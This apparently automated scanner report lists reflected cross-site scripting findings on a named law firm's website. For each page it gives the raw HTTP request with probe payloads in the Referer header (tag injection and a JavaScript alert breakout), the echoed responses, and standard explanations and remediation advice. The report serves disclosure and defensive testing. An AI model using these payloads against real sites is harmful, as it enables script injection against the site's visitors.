GET /contact.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=f5a4c"><a>7d008f3eaa6
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e8d2"><a>935e63f487b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /events.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=1e8d2"><a>935e63f487b
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d1f7'-alert(1)-'2b3427d18c5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events.cfm?id=670&action=view HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=5d1f7'-alert(1)-'2b3427d18c5
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 685f0"><a>2390de3ec9b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /experience.cfm?action=case_study HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=685f0"><a>2390de3ec9b
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3530c"><a>dd14a6ab469 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /global_reach.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=3530c"><a>dd14a6ab469
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - Global Reach</title> <meta name="Description" con ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=3530c"><a>dd14a6ab469"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd76e"><a>5d9b079dc37 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /globals_disclaimer.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=dd76e"><a>5d9b079dc37
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c77c2"><a>9d93e2dce00 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /globals_llp_status.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=c77c2"><a>9d93e2dce00
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92616"><a>de3dc2ef1b7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /globals_non_discrimination.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=92616"><a>de3dc2ef1b7
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca343"><a>0d72f0518a2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /globals_operating_status.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=ca343"><a>0d72f0518a2
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313f3"><a>936b59feb4b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /globals_privacy_policy.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=313f3"><a>936b59feb4b
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92192"><a>3d473dc6629 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /globals_statement_clients_rights.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=92192"><a>3d473dc6629
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2235a"><a>2aadc693209 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /home.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=2235a"><a>2aadc693209
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29b3e"><a>0cbb16e6270 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /industries.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=29b3e"><a>0cbb16e6270
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdc66'-alert(1)-'26a6562a480 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia.cfm?action=view&id=674&t=event HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=fdc66'-alert(1)-'26a6562a480
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - WEBCAST: Implications of the Dodd-Frank Act for Non- ...[SNIP]... d_capture_file).click(function() { $.post("process_user_capture.cfm", { name: name, company: company, email: email, from: 'http://www.google.com/search?hl=en&q=fdc66'-alert(1)-'26a6562a480', document: $(this).attr('id').replace('doc', '') }, function(data) { }, "json"); }); if (requested_capture_forward == '') { setTimeout('$("#doc" + r ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50ec5"><a>383cf4ea404 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /multimedia.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=50ec5"><a>383cf4ea404
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7333"><a>a3f64588368 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /news.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=b7333"><a>a3f64588368
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39941"><a>6ed2a9d4dd6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /offices.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=39941"><a>6ed2a9d4dd6
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5d0e"><a>3554c2ba7f3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /practices.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=a5d0e"><a>3554c2ba7f3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
<html> <head>
<title>Arnold & Porter LLP - Practice Areas & Industries</title> <meta nam ...[SNIP]... <a href="http://www.google.com/search?hl=en&q=a5d0e"><a>3554c2ba7f3"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aac8"><a>6236487f9fd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /press_releases.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=9aac8"><a>6236487f9fd
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
